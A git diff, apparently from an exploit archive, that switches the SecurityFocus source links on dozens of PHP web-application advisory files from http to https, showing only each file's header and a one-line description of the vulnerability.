b/exploits/php/webapps/25889.txt index 6b4d74967..c371733b7 100644 --- a/exploits/php/webapps/25889.txt +++ b/exploits/php/webapps/25889.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14045/info +source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. diff --git a/exploits/php/webapps/25890.txt b/exploits/php/webapps/25890.txt index d4e48f6ef..ddb1fcdcc 100644 --- a/exploits/php/webapps/25890.txt +++ b/exploits/php/webapps/25890.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14045/info +source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. diff --git a/exploits/php/webapps/25891.txt b/exploits/php/webapps/25891.txt index f2289e145..ac21bd189 100644 --- a/exploits/php/webapps/25891.txt +++ b/exploits/php/webapps/25891.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14045/info +source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. diff --git a/exploits/php/webapps/25892.txt b/exploits/php/webapps/25892.txt index 792458f1d..00404a35c 100644 --- a/exploits/php/webapps/25892.txt +++ b/exploits/php/webapps/25892.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14045/info +source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. diff --git a/exploits/php/webapps/25893.txt b/exploits/php/webapps/25893.txt index 85c410229..482b12df8 100644 --- a/exploits/php/webapps/25893.txt +++ b/exploits/php/webapps/25893.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14045/info +source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. diff --git a/exploits/php/webapps/25894.txt b/exploits/php/webapps/25894.txt index ac3876852..07e26a916 100644 --- a/exploits/php/webapps/25894.txt +++ b/exploits/php/webapps/25894.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14045/info +source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. diff --git a/exploits/php/webapps/25895.txt b/exploits/php/webapps/25895.txt index ffe18133f..e8d6f0fcc 100644 --- a/exploits/php/webapps/25895.txt +++ b/exploits/php/webapps/25895.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14045/info +source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. diff --git a/exploits/php/webapps/25897.txt b/exploits/php/webapps/25897.txt index 9d16f7024..29133795a 100644 --- a/exploits/php/webapps/25897.txt +++ b/exploits/php/webapps/25897.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14052/info +source: https://www.securityfocus.com/bid/14052/info UBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25898.txt b/exploits/php/webapps/25898.txt index 3cc4c0be9..98b25d02d 100644 --- a/exploits/php/webapps/25898.txt +++ b/exploits/php/webapps/25898.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14052/info +source: https://www.securityfocus.com/bid/14052/info UBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25899.txt b/exploits/php/webapps/25899.txt index cb1a20353..bcd56c86d 100644 --- a/exploits/php/webapps/25899.txt +++ b/exploits/php/webapps/25899.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14052/info +source: https://www.securityfocus.com/bid/14052/info UBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25900.txt b/exploits/php/webapps/25900.txt index 7b835ce86..3e08c3a82 100644 --- a/exploits/php/webapps/25900.txt +++ b/exploits/php/webapps/25900.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14052/info +source: https://www.securityfocus.com/bid/14052/info UBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25901.txt b/exploits/php/webapps/25901.txt index ca6d618e9..148f969ae 100644 --- a/exploits/php/webapps/25901.txt +++ b/exploits/php/webapps/25901.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14052/info +source: https://www.securityfocus.com/bid/14052/info UBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25902.txt b/exploits/php/webapps/25902.txt index c06dbd410..a362a20c8 100644 --- a/exploits/php/webapps/25902.txt +++ b/exploits/php/webapps/25902.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14052/info +source: https://www.securityfocus.com/bid/14052/info UBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25903.txt b/exploits/php/webapps/25903.txt index 3e343d8d6..2ae83059b 100644 --- a/exploits/php/webapps/25903.txt +++ b/exploits/php/webapps/25903.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14052/info +source: https://www.securityfocus.com/bid/14052/info UBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25904.c b/exploits/php/webapps/25904.c index ecdb52a94..eaa81033f 100644 --- a/exploits/php/webapps/25904.c +++ b/exploits/php/webapps/25904.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14059/info +// source: https://www.securityfocus.com/bid/14059/info CSV_DB.CGI/i_DB.CGI are affected by a remote command execution vulnerability. diff --git a/exploits/php/webapps/25909.txt b/exploits/php/webapps/25909.txt index 3092febfb..ece9c7ecd 100644 --- a/exploits/php/webapps/25909.txt +++ b/exploits/php/webapps/25909.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14071/info +source: https://www.securityfocus.com/bid/14071/info Mensajeitor is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/25919.txt b/exploits/php/webapps/25919.txt index bccfd1df3..b07ad21b2 100644 --- a/exploits/php/webapps/25919.txt +++ b/exploits/php/webapps/25919.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14095/info +source: https://www.securityfocus.com/bid/14095/info Phoroum is prone to SQL injection attacks. Insufficient sanitization of user input may allow a malicious user to manipulate the structure and logic of database queries. diff --git a/exploits/php/webapps/25926.txt b/exploits/php/webapps/25926.txt index 7eef1c4b8..d1c9efbbb 100644 --- a/exploits/php/webapps/25926.txt +++ b/exploits/php/webapps/25926.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14127/info +source: https://www.securityfocus.com/bid/14127/info osTicket is affected by multiple input-validation vulnerabilities because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/25927.pl b/exploits/php/webapps/25927.pl index 0d2981705..ee8c35d03 100755 --- a/exploits/php/webapps/25927.pl +++ b/exploits/php/webapps/25927.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14129/info +source: https://www.securityfocus.com/bid/14129/info RaXnet Cacti is prone to a remote command execution vulnerability that manifests in the 'graph_image.php' script. The issue is due to a bug in the input filters that leads to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25928.txt b/exploits/php/webapps/25928.txt index 4322a0cb6..d15b6b93a 100644 --- a/exploits/php/webapps/25928.txt +++ b/exploits/php/webapps/25928.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14131/info +source: https://www.securityfocus.com/bid/14131/info EasyPHPCalendar is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25929.txt b/exploits/php/webapps/25929.txt index ab6cbd0ce..b458ce1c9 100644 --- a/exploits/php/webapps/25929.txt +++ b/exploits/php/webapps/25929.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14131/info +source: https://www.securityfocus.com/bid/14131/info EasyPHPCalendar is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25930.txt b/exploits/php/webapps/25930.txt index 225ec7043..f1a195436 100644 --- a/exploits/php/webapps/25930.txt +++ b/exploits/php/webapps/25930.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14131/info +source: https://www.securityfocus.com/bid/14131/info EasyPHPCalendar is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25931.txt b/exploits/php/webapps/25931.txt index a0d8bd23e..b0510ce8a 100644 --- a/exploits/php/webapps/25931.txt +++ b/exploits/php/webapps/25931.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14131/info +source: https://www.securityfocus.com/bid/14131/info EasyPHPCalendar is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25932.txt b/exploits/php/webapps/25932.txt index a5d5a8eab..f463b4514 100644 --- a/exploits/php/webapps/25932.txt +++ b/exploits/php/webapps/25932.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14131/info +source: https://www.securityfocus.com/bid/14131/info EasyPHPCalendar is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25934.txt b/exploits/php/webapps/25934.txt index 53afc1b76..815661034 100644 --- a/exploits/php/webapps/25934.txt +++ b/exploits/php/webapps/25934.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14136/info +source: https://www.securityfocus.com/bid/14136/info Plague News System is prone to an SQL injection vulnerability. As a result, the attacker may modify the structure and logic of an SQL query that is made by the application. diff --git a/exploits/php/webapps/25935.txt b/exploits/php/webapps/25935.txt index a7103f34e..1fdf0724f 100644 --- a/exploits/php/webapps/25935.txt +++ b/exploits/php/webapps/25935.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14137/info +source: https://www.securityfocus.com/bid/14137/info Plague News System is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'index.php' script. diff --git a/exploits/php/webapps/25937.txt b/exploits/php/webapps/25937.txt index 04435969a..d70070ea8 100644 --- a/exploits/php/webapps/25937.txt +++ b/exploits/php/webapps/25937.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14139/info +source: https://www.securityfocus.com/bid/14139/info Plague News System is prone to an access restriction bypass vulnerability. The issue exists due to a lack of sanity checks performed by 'delete.php' on deletion requests passed to the script. diff --git a/exploits/php/webapps/25938.txt b/exploits/php/webapps/25938.txt index 2fee4608b..f02733814 100644 --- a/exploits/php/webapps/25938.txt +++ b/exploits/php/webapps/25938.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14142/info +source: https://www.securityfocus.com/bid/14142/info phpPgAdmin is prone to a directory traversal vulnerability. The application fails to filter directory traversal sequences from requests to the login form. diff --git a/exploits/php/webapps/25940.txt b/exploits/php/webapps/25940.txt index 4824194a1..f7d35dca7 100644 --- a/exploits/php/webapps/25940.txt +++ b/exploits/php/webapps/25940.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14154/info +source: https://www.securityfocus.com/bid/14154/info AutoIndex PHP Script is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25941.txt b/exploits/php/webapps/25941.txt index cecbb97fe..9b85298e0 100644 --- a/exploits/php/webapps/25941.txt +++ b/exploits/php/webapps/25941.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14155/info +source: https://www.securityfocus.com/bid/14155/info MyGuestbook is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25942.txt b/exploits/php/webapps/25942.txt index 1cfc68d9a..f47707fcc 100644 --- a/exploits/php/webapps/25942.txt +++ b/exploits/php/webapps/25942.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14158/info +source: https://www.securityfocus.com/bid/14158/info JAWS is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25945.txt b/exploits/php/webapps/25945.txt index 7d58133ed..20f3592cc 100644 --- a/exploits/php/webapps/25945.txt +++ b/exploits/php/webapps/25945.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14166/info +source: https://www.securityfocus.com/bid/14166/info phpWebSite is affected by a directory traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25951.txt b/exploits/php/webapps/25951.txt index 666adf8a4..ba4921c44 100644 --- a/exploits/php/webapps/25951.txt +++ b/exploits/php/webapps/25951.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14180/info +source: https://www.securityfocus.com/bid/14180/info CartWIZ is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25954.txt b/exploits/php/webapps/25954.txt index 6faf98ff6..9d3bc9e8b 100644 --- a/exploits/php/webapps/25954.txt +++ b/exploits/php/webapps/25954.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14184/info +source: https://www.securityfocus.com/bid/14184/info PHPAuction is affected by multiple remote vulnerabilities. These issues can allow an attacker to gain unauthorized access to a site and carry out SQL injection and cross-site scripting attacks. diff --git a/exploits/php/webapps/25955.txt b/exploits/php/webapps/25955.txt index 640173c0e..5c7356a9a 100644 --- a/exploits/php/webapps/25955.txt +++ b/exploits/php/webapps/25955.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14190/info +source: https://www.securityfocus.com/bid/14190/info PhotoGal is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25957.txt b/exploits/php/webapps/25957.txt index ad9c61c26..aee6a8ec8 100644 --- a/exploits/php/webapps/25957.txt +++ b/exploits/php/webapps/25957.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14195/info +source: https://www.securityfocus.com/bid/14195/info PunBB is affected by a SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input through the user profile edit module of the 'profile.php' script before using it in a SQL query. diff --git a/exploits/php/webapps/25958.txt b/exploits/php/webapps/25958.txt index b6a976267..4641e0e74 100644 --- a/exploits/php/webapps/25958.txt +++ b/exploits/php/webapps/25958.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14204/info +source: https://www.securityfocus.com/bid/14204/info ID Board is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25959.txt b/exploits/php/webapps/25959.txt index fd40c5d1e..de4d19a26 100644 --- a/exploits/php/webapps/25959.txt +++ b/exploits/php/webapps/25959.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14208/info +source: https://www.securityfocus.com/bid/14208/info SPiD is a gallery management application written in PHP. diff --git a/exploits/php/webapps/25960.txt b/exploits/php/webapps/25960.txt index 28ef1714c..f3b961f68 100644 --- a/exploits/php/webapps/25960.txt +++ b/exploits/php/webapps/25960.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14209/info +source: https://www.securityfocus.com/bid/14209/info PPA is susceptible to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25964.c b/exploits/php/webapps/25964.c index ce64a1fd3..bf19af566 100644 --- a/exploits/php/webapps/25964.c +++ b/exploits/php/webapps/25964.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14222/info +// source: https://www.securityfocus.com/bid/14222/info PHPsFTPd is affected by a privilege escalation vulnerability. PHPsFTPd is affected by a privilege escalation vulnerability. This issue is due to a failure in 'inc.login.php' when processing login credentials. diff --git a/exploits/php/webapps/25990.txt b/exploits/php/webapps/25990.txt index 026f54495..2092b9ca8 100644 --- a/exploits/php/webapps/25990.txt +++ b/exploits/php/webapps/25990.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14278/info +source: https://www.securityfocus.com/bid/14278/info A cross-site scripting vulnerability affects Clever Copy. This issue is due to a failure of the application to properly sanitize user-supplied URI input that will be output in dynamically generated Web pages. diff --git a/exploits/php/webapps/25994.txt b/exploits/php/webapps/25994.txt index 9eb644200..3ce446e91 100644 --- a/exploits/php/webapps/25994.txt +++ b/exploits/php/webapps/25994.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14294/info +source: https://www.securityfocus.com/bid/14294/info osCommerce is prone to an information-disclosure vulnerability. An attacker could exploit this vulnerability to display the contents of any file normally readable by the webserver process. diff --git a/exploits/php/webapps/25995.txt b/exploits/php/webapps/25995.txt index dff7dfe62..dac31ff6e 100644 --- a/exploits/php/webapps/25995.txt +++ b/exploits/php/webapps/25995.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14301/info +source: https://www.securityfocus.com/bid/14301/info e107 Website System is prone to a script injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25997.txt b/exploits/php/webapps/25997.txt index eeb02eb62..165798e4c 100644 --- a/exploits/php/webapps/25997.txt +++ b/exploits/php/webapps/25997.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14303/info +source: https://www.securityfocus.com/bid/14303/info tForum is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26014.txt b/exploits/php/webapps/26014.txt index d97237b89..9b67250c0 100644 --- a/exploits/php/webapps/26014.txt +++ b/exploits/php/webapps/26014.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14324/info +source: https://www.securityfocus.com/bid/14324/info A cross-site scripting vulnerability affects Form Sender. This issue is due to a failure of the application to properly sanitize user-supplied URI input that will be output in dynamically generated Web pages. diff --git a/exploits/php/webapps/26015.txt b/exploits/php/webapps/26015.txt index 614bf52d1..eb37fe925 100644 --- a/exploits/php/webapps/26015.txt +++ b/exploits/php/webapps/26015.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14326/info +source: https://www.securityfocus.com/bid/14326/info A cross-site scripting vulnerability affects Form Sender. This issue is due to a failure of the application to properly sanitize user-supplied URI input that will be output in dynamically generated Web pages. diff --git a/exploits/php/webapps/26016.txt b/exploits/php/webapps/26016.txt index 5823e53e0..3627ceeec 100644 --- a/exploits/php/webapps/26016.txt +++ b/exploits/php/webapps/26016.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14333/info +source: https://www.securityfocus.com/bid/14333/info PHPNews is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26018.txt b/exploits/php/webapps/26018.txt index 3eeb801cc..522933b0d 100644 --- a/exploits/php/webapps/26018.txt +++ b/exploits/php/webapps/26018.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14343/info +source: https://www.securityfocus.com/bid/14343/info A cross-site scripting vulnerability affects Pyrox Search. This issue is due to a failure of the application to properly sanitize user-supplied URI input that will be output in dynamically generated Web pages. diff --git a/exploits/php/webapps/26019.txt b/exploits/php/webapps/26019.txt index dc4b4208c..fa8ca1138 100644 --- a/exploits/php/webapps/26019.txt +++ b/exploits/php/webapps/26019.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14352/info +source: https://www.securityfocus.com/bid/14352/info Contrexx is affected by multiple input validation vulnerabilities. These issues can allow an attacker to carry out HTML injection, SQL injection and information disclosure attacks. diff --git a/exploits/php/webapps/26020.txt b/exploits/php/webapps/26020.txt index 48f521a25..757a206d9 100644 --- a/exploits/php/webapps/26020.txt +++ b/exploits/php/webapps/26020.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14356/info +source: https://www.securityfocus.com/bid/14356/info Asn Guestbook is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26021.txt b/exploits/php/webapps/26021.txt index deb187fe6..71e0e3142 100644 --- a/exploits/php/webapps/26021.txt +++ b/exploits/php/webapps/26021.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14356/info +source: https://www.securityfocus.com/bid/14356/info Asn Guestbook is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26023.txt b/exploits/php/webapps/26023.txt index 8b00369f1..6fda95760 100644 --- a/exploits/php/webapps/26023.txt +++ b/exploits/php/webapps/26023.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14368/info +source: https://www.securityfocus.com/bid/14368/info Atomic Photo Album is susceptible to a remote PHP file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26025.txt b/exploits/php/webapps/26025.txt index bf3ce8d1a..eb5f64606 100644 --- a/exploits/php/webapps/26025.txt +++ b/exploits/php/webapps/26025.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14373/info +source: https://www.securityfocus.com/bid/14373/info Netquery is affected by multiple remote vulnerabilities. These issues can allow remote attackers to execute arbitrary commands, disclose sensitive information and carry out cross-site scripting attacks. diff --git a/exploits/php/webapps/26026.txt b/exploits/php/webapps/26026.txt index 56cf6357d..16c32a412 100644 --- a/exploits/php/webapps/26026.txt +++ b/exploits/php/webapps/26026.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14373/info +source: https://www.securityfocus.com/bid/14373/info Netquery is affected by multiple remote vulnerabilities. These issues can allow remote attackers to execute arbitrary commands, disclose sensitive information and carry out cross-site scripting attacks. diff --git a/exploits/php/webapps/26027.txt b/exploits/php/webapps/26027.txt index 2ba9afc5c..99785ccf0 100644 --- a/exploits/php/webapps/26027.txt +++ b/exploits/php/webapps/26027.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14373/info +source: https://www.securityfocus.com/bid/14373/info Netquery is affected by multiple remote vulnerabilities. These issues can allow remote attackers to execute arbitrary commands, disclose sensitive information and carry out cross-site scripting attacks. diff --git a/exploits/php/webapps/26028.txt b/exploits/php/webapps/26028.txt index 4b5c08191..fb5e8f08c 100644 --- a/exploits/php/webapps/26028.txt +++ b/exploits/php/webapps/26028.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14373/info +source: https://www.securityfocus.com/bid/14373/info Netquery is affected by multiple remote vulnerabilities. These issues can allow remote attackers to execute arbitrary commands, disclose sensitive information and carry out cross-site scripting attacks. diff --git a/exploits/php/webapps/26029.txt b/exploits/php/webapps/26029.txt index 9dfdb291b..96f201fef 100644 --- a/exploits/php/webapps/26029.txt +++ b/exploits/php/webapps/26029.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14373/info +source: https://www.securityfocus.com/bid/14373/info Netquery is affected by multiple remote vulnerabilities. These issues can allow remote attackers to execute arbitrary commands, disclose sensitive information and carry out cross-site scripting attacks. diff --git a/exploits/php/webapps/26030.txt b/exploits/php/webapps/26030.txt index ee992acc6..9010b72c7 100644 --- a/exploits/php/webapps/26030.txt +++ b/exploits/php/webapps/26030.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14373/info +source: https://www.securityfocus.com/bid/14373/info Netquery is affected by multiple remote vulnerabilities. These issues can allow remote attackers to execute arbitrary commands, disclose sensitive information and carry out cross-site scripting attacks. diff --git a/exploits/php/webapps/26031.txt b/exploits/php/webapps/26031.txt index 7a5cb751c..2c5ab911d 100644 --- a/exploits/php/webapps/26031.txt +++ b/exploits/php/webapps/26031.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14383/info +source: https://www.securityfocus.com/bid/14383/info VBZooM Forum is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26034.txt b/exploits/php/webapps/26034.txt index 5df738c11..2847ac2b7 100644 --- a/exploits/php/webapps/26034.txt +++ b/exploits/php/webapps/26034.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14390/info +source: https://www.securityfocus.com/bid/14390/info NETonE PHPBook is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input to the 'admin' parameter of the 'guestbook.php' script. diff --git a/exploits/php/webapps/26036.txt b/exploits/php/webapps/26036.txt index 20f3b75a1..2a1b7073a 100644 --- a/exploits/php/webapps/26036.txt +++ b/exploits/php/webapps/26036.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14392/info +source: https://www.securityfocus.com/bid/14392/info PNG Counter is prone to a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input that will be output in dynamically generated Web pages. diff --git a/exploits/php/webapps/26037.txt b/exploits/php/webapps/26037.txt index 5919c9600..4c9eeb4c8 100644 --- a/exploits/php/webapps/26037.txt +++ b/exploits/php/webapps/26037.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14395/info +source: https://www.securityfocus.com/bid/14395/info Clever Copy is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26038.txt b/exploits/php/webapps/26038.txt index 1533ad824..3232a3336 100644 --- a/exploits/php/webapps/26038.txt +++ b/exploits/php/webapps/26038.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14395/info +source: https://www.securityfocus.com/bid/14395/info Clever Copy is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26039.txt b/exploits/php/webapps/26039.txt index 810556cd0..7a47e6e22 100644 --- a/exploits/php/webapps/26039.txt +++ b/exploits/php/webapps/26039.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14396/info +source: https://www.securityfocus.com/bid/14396/info BMForum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26040.txt b/exploits/php/webapps/26040.txt index c6c6ccff7..f85b43eb6 100644 --- a/exploits/php/webapps/26040.txt +++ b/exploits/php/webapps/26040.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14396/info +source: https://www.securityfocus.com/bid/14396/info BMForum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26041.txt b/exploits/php/webapps/26041.txt index 1bbf695f4..e48ad9b3d 100644 --- a/exploits/php/webapps/26041.txt +++ b/exploits/php/webapps/26041.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14396/info +source: https://www.securityfocus.com/bid/14396/info BMForum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26042.txt b/exploits/php/webapps/26042.txt index e5fcad536..71c47c72b 100644 --- a/exploits/php/webapps/26042.txt +++ b/exploits/php/webapps/26042.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14396/info +source: https://www.securityfocus.com/bid/14396/info BMForum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26043.txt b/exploits/php/webapps/26043.txt index 5387c0581..1645614a8 100644 --- a/exploits/php/webapps/26043.txt +++ b/exploits/php/webapps/26043.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14397/info +source: https://www.securityfocus.com/bid/14397/info Clever Copy is affected by an unauthorized access vulnerability. This issue is due to a failure in the application to perform proper access validation checks before granting access to private message functions. diff --git a/exploits/php/webapps/26045.txt b/exploits/php/webapps/26045.txt index 16e556abe..2c1006136 100644 --- a/exploits/php/webapps/26045.txt +++ b/exploits/php/webapps/26045.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14403/info +source: https://www.securityfocus.com/bid/14403/info PHPList is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/26047.txt b/exploits/php/webapps/26047.txt index 479b143d4..9d5314b06 100644 --- a/exploits/php/webapps/26047.txt +++ b/exploits/php/webapps/26047.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14416/info +source: https://www.securityfocus.com/bid/14416/info Easypx41 is prone to cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/26048.txt b/exploits/php/webapps/26048.txt index 8d1ae5cde..05dc89d6c 100644 --- a/exploits/php/webapps/26048.txt +++ b/exploits/php/webapps/26048.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14421/info +source: 